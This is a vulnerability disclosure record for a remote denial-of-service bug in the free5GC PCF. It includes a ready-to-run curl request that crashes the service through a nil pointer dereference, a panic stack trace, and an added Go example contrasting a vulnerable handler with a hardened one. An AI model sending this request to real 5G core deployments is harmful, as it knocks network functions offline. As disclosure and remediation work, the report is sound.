Submit #741194: free5gc PCF v4.1.0 Denial of Service

Title: free5gc PCF v4.1.0 Denial of Service
Description:

## Bug Description

The free5GC PCF can be crashed remotely by an HTTP CreateSmPolicy request that leads to a downstream OpenAPI call returning 404 Not Found. After logging the OpenAPI error, PCF continues executing the request handler and hits a nil pointer dereference in Processor.HandleCreateSmPolicyRequest (internal/sbi/processor/smpolicy.go, around line 82), causing a panic and terminating the PCF process. This results in a denial of service.

## Credit

Ziyu Lin, Xiaofeng Wang, Wei Dong (Nanyang Technological University)

## CVSS3.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

## To Reproduce

Steps to reproduce the behavior:

```
curl -sS -X POST http://x.x.x.x:8000/npcf-smpolicycontrol/v1/sm-policies \
  -H 'Content-Type: application/json' \
  -d '{
    "supi":"imsi-208930000000003",
    "pduSessionId":1,
    "dnn":"internet-bad",
    "sliceInfo":{"sst":1,"sd":"010203"},
    "servingNetwork":{"mcc":"208","mnc":"93"},
    "accessType":"3GPP_ACCESS",
    "notificationUri":"http://smf.free5gc.org:8000/npcf-smpolicycontrol/v1/notify"
  }'
```

## Expected Behavior

PCF should handle downstream OpenAPI failures (e.g., 404 Not Found) gracefully: return an appropriate HTTP error response (e.g., 4xx/5xx with ProblemDetails), and stop further processing of the request (abort/return from handler). PCF should not panic or terminate.

## Screenshots

<img width="1035" height="574" alt="Image" src="https://github.com/user-attachments/assets/d2864ae5-71dd-40f9-b510-e1148e6a3e41" />

## Environment

- free5GC Version: v4.1.0
- OS: Ubuntu 22.04 Server
- Kernel version: [e.g. 5.15.0-0-generic]
- go version: go version go1.24.9 linux/amd64

### Log File

```
026-01-15T02:55:56.144398346Z [INFO][PCF][SMpolicy] Handle CreateSmPolicy
2026-01-15T02:55:56.150987133Z [ERRO][PCF][Consumer] openapi error: 404, Not Found
2026-01-15T02:55:56.151135343Z [ERRO][PCF][GIN] panic: runtime error: invalid memory address or nil pointer dereference
goroutine 1775 [running]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:26 +0x5e
github.com/free5gc/util/logger.NewGinWithLogrus.ginRecover.func2.1()
	/go/pkg/mod/github.com/free5gc/[email protected]/logger/logger.go:298 +0x117
panic({0xf51420?, 0x199fd90?})
	/usr/local/go/src/runtime/panic.go:792 +0x132
github.com/free5gc/pcf/internal/sbi/processor.(*Processor).HandleCreateSmPolicyRequest(_, _, {0x0, 0x0, {0x0, 0x0}, {0xc000560348, 0x14}, 0x0, {0x0, ...}, ...})
	/go/src/free5gc/NFs/pcf/internal/sbi/processor/smpolicy.go:82 +0x562
github.com/free5gc/pcf/internal/sbi.(*Server).HTTPCreateSMPolicy(0xc00024f3c0, 0xc0005ac700)
	/go/src/free5gc/NFs/pcf/internal/sbi/api_smpolicy.go:86 +0x405
github.com/gin-gonic/gin.(*Context).Next(0xc0005ac700)
	/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 +0x2b
github.com/free5gc/pcf/internal/sbi.NewServer.InboundMetrics.func5(0xc0005ac700)
	/go/pkg/mod/github.com/free5gc/[email protected]/metrics/middleware.go:15 +0x45
github.com/gin-gonic/gin.(*Context).Next(0xc0005ac700)
	/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 +0x2b
github.com/free5gc/util/logger.NewGinWithLogrus.ginRecover.func2(0x7f3f8c7042a8?)
	/go/pkg/mod/github.com/free5gc/[email protected]/logger/logger.go:330 +0x48
github.com/gin-gonic/gin.(*Context).Next(0xc0005ac700)
	/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 +0x2b
github.com/free5gc/util/logger.NewGinWithLogrus.ginToLogrus.func1(0xc0005ac700)
	/go/pkg/mod/github.com/free5gc/[email protected]/logger/logger.go:256 +0x65
github.com/gin-gonic/gin.(*Context).Next(...)
	/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185
github.com/gin-gonic/gin.(*Engine).handleHTTPRequest(0xc0001eb040, 0xc0005ac700)
	/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:633 +0x872
github.com/gin-gonic/gin.(*Engine).ServeHTTP(0xc0001eb040, {0x129b4a0, 0xc000000460}, 0xc0004a7180)
	/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:589 +0x1aa
golang.org/x/net/http2/h2c.h2cHandler.ServeHTTP({{0x1294820?, 0xc0001eb040?}, 0xc000252c40?}, {0x129b4a0, 0xc000000460}, 0xc0004a7180)
	/go/pkg/mod/golang.org/x/[email protected]/http2/h2c/h2c.go:125 +0x673
net/http.serverHandler.ServeHTTP({0x1298488?}, {0x129b4a0?, 0xc000000460?}, 0x1?)
	/usr/local/go/src/net/http/server.go:3301 +0x8e
net/http.(*conn).serve(0xc0000fee10, {0x129c5f8, 0xc000570e40})
	/usr/local/go/src/net/http/server.go:2102 +0x625
created by net/http.(*Server).Serve in goroutine 35
	/usr/local/go/src/net/http/server.go:3454 +0x485
```

Source: https://github.com/free5gc/free5gc/issues/803
User: ZiyuLin (UID 93568)
Submission: 01/17/2026 03:16 AM (2 months ago)
Moderation: 02/01/2026 08:50 AM (15 days later)
Status: Accepted
VulDB entry: 343638 [Free5GC pcf up to 1.4.1 smpolicy.go HandleCreateSmPolicyRequest null pointer dereference]
Points: 20
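
The log-and-continue pattern described in the report, beside a handler that returns after the downstream failure, as an added example that is not free5GC's code. `policyData`, `lookup`, both handlers and the `dnn` query parameter are hypothetical stand-ins, and the request is constructed.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// policyData and lookup are hypothetical stand-ins for the downstream consumer call.
type policyData struct{ Rule string }

func lookup(dnn string) (*policyData, error) {
	if dnn != "internet" { // constructed: only this DNN is provisioned
		return nil, errors.New("openapi error: 404, Not Found")
	}
	return &policyData{Rule: "default"}, nil
}

// vulnerable logs the error but keeps going, so data is nil when it is used.
func vulnerable(w http.ResponseWriter, r *http.Request) {
	data, err := lookup(r.URL.Query().Get("dnn"))
	if err != nil {
		fmt.Println("[ERRO]", err)
	}
	fmt.Fprint(w, data.Rule) // nil pointer dereference on lookup failure
}

// hardened answers with a problem document and returns from the handler.
func hardened(w http.ResponseWriter, r *http.Request) {
	data, err := lookup(r.URL.Query().Get("dnn"))
	if err != nil || data == nil {
		w.Header().Set("Content-Type", "application/problem+json")
		w.WriteHeader(http.StatusNotFound)
		fmt.Fprint(w, `{"status":404,"detail":"policy data not found"}`)
		return
	}
	fmt.Fprint(w, data.Rule)
}

// serve sends one constructed request and reports the status and any panic.
func serve(h http.HandlerFunc, dnn string) (status int, panicked bool) {
	defer func() { panicked = recover() != nil }()
	rec := httptest.NewRecorder()
	h(rec, httptest.NewRequest("POST", "/sm-policies?dnn="+dnn, nil))
	return rec.Code, false
}

func main() { fmt.Println(serve(vulnerable, "internet-bad")) }
```
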
